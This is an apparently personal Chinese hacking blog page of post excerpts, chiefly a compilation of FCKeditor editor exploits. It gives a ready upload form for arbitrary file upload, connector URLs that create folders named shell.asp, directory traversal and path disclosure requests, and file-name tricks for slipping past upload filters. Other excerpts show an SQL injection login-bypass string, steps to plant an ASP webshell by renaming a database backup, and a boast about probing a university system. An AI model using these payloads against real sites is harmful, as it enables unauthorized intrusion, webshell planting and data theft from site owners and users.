光的传人

欢迎访问漏洞最新发布

快云VPS

Struts2高危漏洞,又一轮大规模脱裤行动开始——该改密码的赶紧的

又是一个血雨腥风的夜晚~今夜不知道有多少程序员要加班加点的打补丁,又不知道有多少黑阔在彻夜不眠的给人家脱裤子~Struts2今天曝出高危漏洞,又一轮大规模脱裤行动开始了~

看看下面的这些大站吧,所谓的大站在这样的漏洞下也无力还手~

2013-07-17淘宝某站点struts2命令执行1/1鬼魅羊...

...

新版shopex品牌专区品牌详细页面描述出现问题

我想这应该是shopex的一个小小的bug吧,或者是shopex为了逼迫人们自己去设置品牌页面描述故意弄得?具体问题是这样的,最新版的shopex在添加品牌后,品牌详细页面会直接调用品牌页面的全部介绍(不是截取,是全部,这也太多了吧),这不是重点,重点是当你设置了品牌介绍里的字体、文字大小等,就会出现错误,meta描述代码就会跟“品牌介绍”里面的文字样式代码出现冲突,导致网页顶部出现meta描述代码里的全部内容,也就是说meta描述里面的内容直接在前台显示出来了!

试着修改了这段代码,结果品牌页面正常了,但是首页空白了!

...

网站防黑新招——将计就计

今早上坐车的时候,突然想到一个很好的点子,一个防黑新招——将计就计!

思路是有了,但是要实施起来应该也不难,先分享给大家,看看怎么样。

一般黑客得到一个像黑的网址,会先用扫描工具扫一下后台、上传文件、常见的漏洞目录(比如编辑器目录)等。当一个网站存在注入漏洞的时候,小黑很容易得到用户名密码,进而通过扫描后台直接用注入出来的用户名密码进入后台,于是webshell就不远了!

这个过程中,黑客入侵网站最重要的关键点在于“找到后台路径”。像dede织梦这样成千上万网站使用的CMS最容易出现注入漏洞,每次0day一出来,就会有大批的网站沦为垃圾外链场~为什么呢?因为很多站长不注重网站安全,默认后台懒得修改。

...

Fckeditor漏洞最新整理 2

1、查看编辑器版本
/fckeditor/editor/dialog/fck_about.html

...

Fckeditor编辑器漏洞整理

FCKeditor v2.43版本FCKeditor/editor/filemanager/browser/default/connectors/php/config.php
FCKeditor V2.6.6版本 fckeditor/editor/filemanager/connectors/asp/config.php

查看编辑器版本
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————

2. Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
—————————————————————————————————————————————————————————————

高版本存在 低版本不存在
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
       很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
   4.1:提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
   4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
—————————————————————————————————————————————————————————————

5. 突破建立文件夹

FCKeditor V2.6.6

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

FCKeditor v2.4.3

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
—————————————————————————————————————————————————————————————
/wwwroot/userfiles/image/333.asp/2.asp;3.jpg

6. FCKeditor 中test 文件的上传地址


最新的 利用iis解析漏洞asp文件夹上存图片  或者是2.asp;jpg


FCKeditor v2.4.3
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
userfiles/file/1.asp;2(1).jpg
FCKeditor V2.6.6
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
—————————————————————————————————————————————————————————————

7.常用上传地址
FCKeditor v2.4.3
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor V2.6.6不能上传 不能建立
FCKeditor v2.4.3能上传 能建立
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
JSP 版:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
—————————————————————————————————————————————————————————————

8.其他上传地址
全部存在
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
一般很多站点都已删除_samples 目录,可以试试。

FCKeditor V2.6.6(空白)
FCKeditor v2.4.3 存在
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址
Version 2.4.1 测试通过
修改CurrentFolder 参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
也可以直接浏览盘符:
JSP 版本:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
—————————————————————————————————————————————————————————————

10.爆路径漏洞
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题
       影响版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
       而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
       在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
—————————————————————————————————————————————————————————————

12.最古老的漏洞,Type文件没有限制!
       我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!

...

PHP万能密码

说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是百分之百。可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了PHP注入。

其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台。其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。如果你用这样的万能密码'or'='or',当然进不去,理由是GPC开启的时候单引号会被转换。PHP注入时我常用的万能密码是:'or 1=1/*.

那我们分析一下为什么这可以进后台。

......

NC、WSockExpert使用检测

本文章仅用于个人学习,转载自网络。

1.NC、WSockExpert,双剑合壁

  NC和WSockExpert是本地提交入侵中经常用到的工具,WSockExpert用于数据包的抓取,NC用于数据包的提交。下面我们就来看看如何利用这两款工具绕过L-blog的本地提交验证。同上文中步骤,注册完成后来到“编辑个人资料”页面,我们运行WSockExpert,点击工具栏处的“打开”按钮,找到IE的进程,双击,选中当前L-blog的进程信息,点击“OPEN”进入抓包状态。我们切换回L-blog,在“编辑个人资料”页面中填入旧密码,点击“确定编辑”。这时我们会发现
...

...

利用数据库备份和图片上传加载ASP木马

虽然ASP注入已经是很早的事了,还是有很多使用良精早期程序站点都存在这个问题。我们可以很轻易的通过小榕的wid/wed或者啊D的注入工具得到用户密码,从而进入后台管理。通常后台都提供图片(jpg,gif)上传功能及数据库备份功能,执行以下步骤上传ASP木马:

1、将ASP木马(如海洋顶端)改名.gif或.jpg(允许的上传格式即可);

2、复制成功上传的图片的路径,如image/upload/2012.gif

3、转到数据库备份界面: 如:当前数据库:../data/data.mdb  (改成../image/upload/2012.gif)
...

...

某知名大学教务管理系统竟然如此不堪一击!

今天是值得兴奋的一天,首先通过友情检测某知名大学某学院的教务管理系统,发现自己有做黑客(注:黑客精神指的就是善于独立思考、喜欢自由探索的一种思维方式,这里说的黑客是指有黑客精神的真正黑客)的潜质!再次,后天也就是30号,我一个从初中认识到现在做了11年好朋友的兄弟结婚,明天坐车回家准备去参加他的婚礼!第三,路过一家手机充值店的时候给妈妈买了一部比较好的老人手机(一直以来想给妈妈买部这样的手机,今天终于实现愿望了)!

...